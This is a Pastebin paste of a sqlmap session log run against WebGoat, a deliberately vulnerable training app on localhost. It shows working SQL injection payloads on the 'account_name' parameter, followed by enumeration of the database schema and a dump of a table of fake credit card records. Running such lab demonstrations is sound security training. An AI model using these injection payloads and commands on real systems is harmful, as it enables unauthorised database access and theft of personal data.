API tools faq
paste
Guest User

Untitled

a guest
Oct 13th, 2015
119
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.42 KB | None | 0 0
raw download clone embed print report
  1. $ python sqlmap.py -r webgoat.req --current-user --tables --columns -T user_data -D public --dbs --fresh-queries --safe-url "http://localhost:8080/WebGoat/service/restartlesson.mvc" --safe-freq=1 --flush-session --dump --batch
  2. _
  3. ___ ___| |_____ ___ ___ {1.0-dev-48619d9}
  4. |_ -| . | | | .'| . |
  5. |___|_ |_|_|_|_|__,| _|
  6. |_| |_| http://sqlmap.org
  7.  
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9.  
  10. [*] starting at 13:03:47
  11.  
  12. [13:03:47] [INFO] parsing HTTP request from 'webgoat.req'
  13. [13:03:47] [INFO] testing connection to the target URL
  14. [13:03:47] [INFO] heuristics detected web page charset 'ascii'
  15. [13:03:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
  16. [13:03:47] [INFO] testing if the target URL is stable
  17. [13:03:48] [INFO] target URL is stable
  18. [13:03:48] [INFO] testing if POST parameter 'account_name' is dynamic
  19. [13:03:48] [INFO] confirming that POST parameter 'account_name' is dynamic
  20. [13:03:48] [INFO] POST parameter 'account_name' is dynamic
  21. [13:03:48] [INFO] heuristic (basic) test shows that POST parameter 'account_name' might be injectable (possible DBMS: 'HSQLDB')
  22. [13:03:48] [INFO] heuristic (XSS) test shows that POST parameter 'account_name' might be vulnerable to XSS attacks
  23. [13:03:48] [INFO] testing for SQL injection on POST parameter 'account_name'
  24. it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  25. for the remaining tests, do you want to include all tests for 'HSQLDB' extending provided level (1) and risk (1) values? [Y/n] Y
  26. [13:03:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  27. [13:03:48] [WARNING] reflective value(s) found and filtering out
  28. [13:03:48] [INFO] POST parameter 'account_name' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
  29. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
  30. [13:03:48] [WARNING] time-based comparison requires larger statistical model, please wait................
  31. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 stacked queries (heavy query)'
  32. [13:03:48] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
  33. [13:03:48] [INFO] testing 'HSQLDB >= 2.0 stacked queries (heavy query)'
  34. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)'
  35. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)'
  36. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)'
  37. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)'
  38. [13:03:48] [INFO] testing 'HSQLDB > 2.0 AND time-based blind (heavy query)'
  39. [13:03:48] [INFO] testing 'HSQLDB > 2.0 OR time-based blind (heavy query)'
  40. [13:03:48] [INFO] testing 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)'
  41. [13:03:48] [INFO] testing 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)'
  42. [13:03:48] [INFO] testing 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)'
  43. [13:03:48] [INFO] testing 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)'
  44. [13:03:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  45. [13:03:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  46. [13:03:48] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  47. [13:03:48] [INFO] target URL appears to have 7 columns in query
  48. [13:03:48] [INFO] POST parameter 'account_name' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
  49. POST parameter 'account_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  50. sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
  51. ---
  52. Parameter: account_name (POST)
  53. Type: boolean-based blind
  54. Title: AND boolean-based blind - WHERE or HAVING clause
  55. Payload: account_name=Smith' AND 9088=9088 AND 'honL'='honL&SUBMIT=Go!
  56.  
  57. Type: UNION query
  58. Title: Generic UNION query (NULL) - 7 columns
  59. Payload: account_name=Smith' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)||CHAR(120)||CHAR(107)||CHAR(113)||CHAR(113)||CHAR(110)||CHAR(99)||CHAR(67)||CHAR(109)||CHAR(84)||CHAR(114)||CHAR(66)||CHAR(120)||CHAR(119)||CHAR(70)||CHAR(107)||CHAR(109)||CHAR(90)||CHAR(65)||CHAR(116)||CHAR(84)||CHAR(76)||CHAR(111)||CHAR(70)||CHAR(110)||CHAR(115)||CHAR(109)||CHAR(72)||CHAR(68)||CHAR(103)||CHAR(66)||CHAR(74)||CHAR(83)||CHAR(114)||CHAR(101)||CHAR(74)||CHAR(82)||CHAR(71)||CHAR(108)||CHAR(103)||CHAR(100)||CHAR(82)||CHAR(75)||CHAR(122)||CHAR(98)||CHAR(113)||CHAR(118)||CHAR(106)||CHAR(98)||CHAR(113) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- &SUBMIT=Go!
  60. ---
  61. [13:03:48] [INFO] testing HSQLDB
  62. [13:03:48] [INFO] confirming HSQLDB
  63. [13:03:48] [INFO] the back-end DBMS is HSQLDB
  64. [13:03:49] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  65. [13:03:49] [INFO] retrieved:
  66. back-end DBMS: HSQLDB >= 1.7.2 and < 1.8.0
  67. [13:03:50] [INFO] fetching current user
  68. current user: 'SA'
  69. [13:03:50] [INFO] fetching database names
  70. [13:03:50] [INFO] the SQL query used returns 2 entries
  71. [13:03:50] [INFO] retrieved: INFORMATION_SCHEMA
  72. [13:03:50] [INFO] retrieved: PUBLIC
  73. available databases [2]:
  74. [*] INFORMATION_SCHEMA
  75. [*] PUBLIC
  76.  
  77. [13:03:50] [INFO] fetching tables for database: 'PUBLIC'
  78. [13:03:50] [INFO] the SQL query used returns 61 entries
  79. [13:03:50] [INFO] retrieved: USER_SYSTEM_DATA
  80. [13:03:50] [INFO] retrieved: WEATHER_DATA
  81. [13:03:50] [INFO] retrieved: USER_DATA_TAN
  82. [13:03:50] [INFO] retrieved: USER_LOGIN
  83. [13:03:50] [INFO] retrieved: TRANSACTIONS
  84. [13:03:50] [INFO] retrieved: USER_DATA
  85. [13:03:50] [INFO] retrieved: SALARIES
  86. [13:03:50] [INFO] retrieved: TAN
  87. [13:03:50] [INFO] retrieved: PRODUCT_SYSTEM_DATA
  88. [13:03:50] [INFO] retrieved: ROLES
  89. [13:03:50] [INFO] retrieved: OWNERSHIP
  90. [13:03:50] [INFO] retrieved: PINS
  91. [13:03:50] [INFO] retrieved: MESSAGES
  92. [13:03:50] [INFO] retrieved: MFE_IMAGES
  93. [13:03:50] [INFO] retrieved: AUTH
  94. [13:03:50] [INFO] retrieved: EMPLOYEE
  95. Database: PUBLIC
  96. [16 tables]
  97. +---------------------+
  98. | AUTH |
  99. | EMPLOYEE |
  100. | MESSAGES |
  101. | MFE_IMAGES |
  102. | OWNERSHIP |
  103. | PINS |
  104. | PRODUCT_SYSTEM_DATA |
  105. | ROLES |
  106. | SALARIES |
  107. | TAN |
  108. | TRANSACTIONS |
  109. | USER_DATA |
  110. | USER_DATA_TAN |
  111. | USER_LOGIN |
  112. | USER_SYSTEM_DATA |
  113. | WEATHER_DATA |
  114. +---------------------+
  115.  
  116. [13:03:50] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
  117. [13:03:50] [INFO] the SQL query used returns 7 entries
  118. [13:03:50] [INFO] retrieved: "CC_NUMBER","VARCHAR"
  119. [13:03:50] [INFO] retrieved: "CC_TYPE","VARCHAR"
  120. [13:03:50] [INFO] retrieved: "COOKIE","VARCHAR"
  121. [13:03:50] [INFO] retrieved: "FIRST_NAME","VARCHAR"
  122. [13:03:50] [INFO] retrieved: "LAST_NAME","VARCHAR"
  123. [13:03:50] [INFO] retrieved: "LOGIN_COUNT","INTEGER"
  124. [13:03:50] [INFO] retrieved: "USERID","INTEGER"
  125. Database: PUBLIC
  126. Table: USER_DATA
  127. [7 columns]
  128. +-------------+---------+
  129. | Column | Type |
  130. +-------------+---------+
  131. | CC_NUMBER | VARCHAR |
  132. | CC_TYPE | VARCHAR |
  133. | COOKIE | VARCHAR |
  134. | FIRST_NAME | VARCHAR |
  135. | LAST_NAME | VARCHAR |
  136. | LOGIN_COUNT | INTEGER |
  137. | USERID | INTEGER |
  138. +-------------+---------+
  139.  
  140. [13:03:50] [INFO] fetching columns for table 'USER_DATA' in database 'PUBLIC'
  141. [13:03:50] [INFO] the SQL query used returns 7 entries
  142. [13:03:50] [INFO] retrieved: "CC_NUMBER","VARCHAR"
  143. [13:03:50] [INFO] retrieved: "CC_TYPE","VARCHAR"
  144. [13:03:50] [INFO] retrieved: "COOKIE","VARCHAR"
  145. [13:03:50] [INFO] retrieved: "FIRST_NAME","VARCHAR"
  146. [13:03:50] [INFO] retrieved: "LAST_NAME","VARCHAR"
  147. [13:03:50] [INFO] retrieved: "LOGIN_COUNT","INTEGER"
  148. [13:03:50] [INFO] retrieved: "USERID","INTEGER"
  149. [13:03:50] [INFO] fetching entries for table 'USER_DATA' in database 'PUBLIC'
  150. [13:03:50] [INFO] the SQL query used returns 13 entries
  151. [13:03:50] [INFO] retrieved: "123456789","MC"," ","Jane","Plane","0","103"
  152. [13:03:50] [INFO] retrieved: "123609789","MC"," ","Peter","Sand","0","15603"
  153. [13:03:50] [INFO] retrieved: "176896789","MC"," ","Jolly","Hershey","0","10312"
  154. [13:03:50] [INFO] retrieved: "2234200065411","MC"," ","Joe","Snow","0","101"
  155. [13:03:50] [INFO] retrieved: "2435600002222","MC"," ","John","Smith","0","102"
  156. [13:03:50] [INFO] retrieved: "333300003333","AMEX"," ","Jolly","Hershey","0","10312"
  157. [13:03:51] [INFO] retrieved: "333498703333","AMEX"," ","Jane","Plane","0","103"
  158. [13:03:51] [INFO] retrieved: "33413003333","AMEX"," ","Grumpy","youaretheweakestlink","0","10323"
  159. [13:03:51] [INFO] retrieved: "33843453533","AMEX"," ","Joesph","Something","0","15613"
  160. [13:03:51] [INFO] retrieved: "338893453333","AMEX"," ","Peter","Sand","0","15603"
  161. [13:03:51] [INFO] retrieved: "4352209902222","AMEX"," ","John","Smith","0","102"
  162. [13:03:51] [INFO] retrieved: "673834489","MC"," ","Grumpy","youaretheweakestlink","0","10323"
  163. [13:03:51] [INFO] retrieved: "987654321","VISA"," ","Joe","Snow","0","101"
  164. [13:03:51] [INFO] analyzing table dump for possible password hashes
  165. Database: PUBLIC
  166. Table: USER_DATA
  167. [13 entries]
  168. +--------+--------+---------+----------------------+---------------+------------+-------------+
  169. | USERID | COOKIE | CC_TYPE | LAST_NAME | CC_NUMBER | FIRST_NAME | LOGIN_COUNT |
  170. +--------+--------+---------+----------------------+---------------+------------+-------------+
  171. | 103 | NULL | MC | Plane | 123456789 | Jane | 0 |
  172. | 15603 | NULL | MC | Sand | 123609789 | Peter | 0 |
  173. | 10312 | NULL | MC | Hershey | 176896789 | Jolly | 0 |
  174. | 101 | NULL | MC | Snow | 2234200065411 | Joe | 0 |
  175. | 102 | NULL | MC | Smith | 2435600002222 | John | 0 |
  176. | 10312 | NULL | AMEX | Hershey | 333300003333 | Jolly | 0 |
  177. | 103 | NULL | AMEX | Plane | 333498703333 | Jane | 0 |
  178. | 10323 | NULL | AMEX | youaretheweakestlink | 33413003333 | Grumpy | 0 |
  179. | 15613 | NULL | AMEX | Something | 33843453533 | Joesph | 0 |
  180. | 15603 | NULL | AMEX | Sand | 338893453333 | Peter | 0 |
  181. | 102 | NULL | AMEX | Smith | 4352209902222 | John | 0 |
  182. | 10323 | NULL | MC | youaretheweakestlink | 673834489 | Grumpy | 0 |
  183. | 101 | NULL | VISA | Snow | 987654321 | Joe | 0 |
  184. +--------+--------+---------+----------------------+---------------+------------+-------------+
  185.  
  186. [13:03:51] [INFO] table 'PUBLIC.USER_DATA' dumped to CSV file '/home/stamparm/.sqlmap/output/localhost/dump/PUBLIC/USER_DATA.csv'
  187. [13:03:51] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/localhost'
  188.  
  189. [*] shutting down at 13:03:51
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!